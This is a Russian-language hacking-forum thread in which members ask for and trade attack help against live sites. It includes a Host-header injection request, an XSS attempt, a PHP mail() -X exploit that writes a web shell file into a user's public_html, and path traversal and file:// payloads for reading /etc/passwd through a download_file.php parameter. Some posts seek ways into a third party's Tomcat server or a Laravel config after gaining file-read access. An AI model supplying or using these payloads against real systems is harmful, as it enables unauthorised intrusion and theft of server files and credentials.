Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    + вопрос как мог выполнется запрос если он меняет HOST ?
    Code:
    https://hackerone.com/reports/226659
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ну ты прочитай
     
  3. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Немогу некак понять Host Header Atack что я не совал в Host: ничего не меняется в [SERVER_NAME] и [HTTP_HOST] инструкцию брал
    Code:
    https://habrahabr.ru/post/166855/
    [​IMG]
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я просто не понимаю, какой результат ты ожидаешь
     
    Alexandr17 likes this.
  5. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Чтоб одна из переменых [SERVER_NAME] и [HTTP_HOST] поменялась на ok.ru как на фото
    С https://habrahabr.ru/post/166855/
    Code:
    Оправляем
    GET http://site.dev/phpinfo.php HTTP/1.1
    Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Charset:windows-1251,utf-8;q=0.7,*;q=0.3
    Accept-Language:ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
    Cache-Control:max-age=0
    Connection:keep-alive
    Host:~%#$^&*()<>?@\!."'{}[]=+|
    Referer:http://site.dev/index.htm
    User-Agent:TelnetTest
    
    И смотрим:
    _SERVER["SERVER_NAME"]: ~%#$^&*()<>?@\!."'{}[]=+|
    _SERVER["HTTP_HOST"]: ~%#$^&*()<>?@\!."'{}[]=+|
     
    #2205 Octavian, 30 Dec 2017
    Last edited: 30 Dec 2017
  6. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    https://vlevit.org/ru/blog/tech/host-spoofing-prevention
    http://rus-linux.net/MyLDP/server/securing-apache-part-5-http-message-architecture.html
    http://nginx.org/en/docs/http/request_processing.html
     
    _________________________
  7. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    Годно. Побольше бы таких гайдов по бурпу. Программа многофункциональная. С одной теорией мне лично сложновато понять полный функционал. Особенно фаззинг и так далее...
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Так есть же гайд по бурпу
    https://forum.antichat.ru/threads/servis-staty-po-realpazam.452520/#post-4124151
     
    Alexandr17 likes this.
  9. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Делаю простую XSS которая внедряется но выдает ошибку в Console
    Code:
    Uncaught ReferenceError: PROMPT is not defined
        at profile:107
     
  10. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Привычка капсом все писать? Попробуй prompt
     
    Octavian likes this.
  11. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Да точно дело в пробеле просто думал что регистр не важен, саит сам переделол в большои регистр
     
  12. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    У меня такои сплоит не работает https://xakep.ru/2017/01/12/phpmailer-exploit/ или в новои версии PHP исправили?
    Code:
    <?php
    mail("pes@localhost", "CheckOneTwo", "Hello!", "", "-OQueueDirectory=/tmp/ -X/home/cafeperspectiva/public_html/1.php");
    ?>
     
  13. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    который без патча PHPMailer < 5.2.18
     
    _________________________
  14. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    да но дело не в phpmailer а в функцыии mail() которую он вызывает, и 5 параметр, выходит что такои php фаил должен создать мне фаил 1.php
     
  15. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Где у тебя? Какой MTA установлен? К примеру, postfix не поддерживает -X.

    Это не баг, это фича.
     
    BabaDook and dooble like this.
  16. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    Наткнулся на одном сервере на Apache Tomcat 8.5.23 - перед глазами страница с радостной надписью, что сервер успешно установлен.
    Доступ к
    Code:
    /manager/html
    /host-manager/html
    /manager/status
    Заблочен - я так понял по быстрому чтению доков - заблочен из коробки во имя безопасности.
    Но чутью зверя подсказывает, что нерадивый одмен забыл/забил на конфигурацию и как-то это можно раскрутить.
    Можно ли, уважаемые знатоки? Прошу вектор.
     
    #2216 r0, 6 Jan 2018
    Last edited: 6 Jan 2018
  17. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Получил доступ к чтению фаилов но не могу добратся до конфига Laravel, помогите приватно
     
  18. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    Товарищи, помогите пллз.
    Есть урл site,com/download_file.php?path=xxxxxxx/65/1 где x-разные циферки

    в зависимости от того, что вводишь, скачиваются либо разные пдфки, либо пустой файл download_file.php, но наверняка же можно и чего-нибудь интересное скачать.
    как можно поискать закономерности в этом цифровом path?)
     
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    site,com/download_file.php?path=../../../../../etc/passwd
    site,com/download_file.php?path=file:///etc/passwd
    site,com/download_file.php?path=http://site.ua
    site,com/download_file.php?path= итд
     
    erwerr2321 likes this.
  20. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    ессно я сразу же это попроовал)
    я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...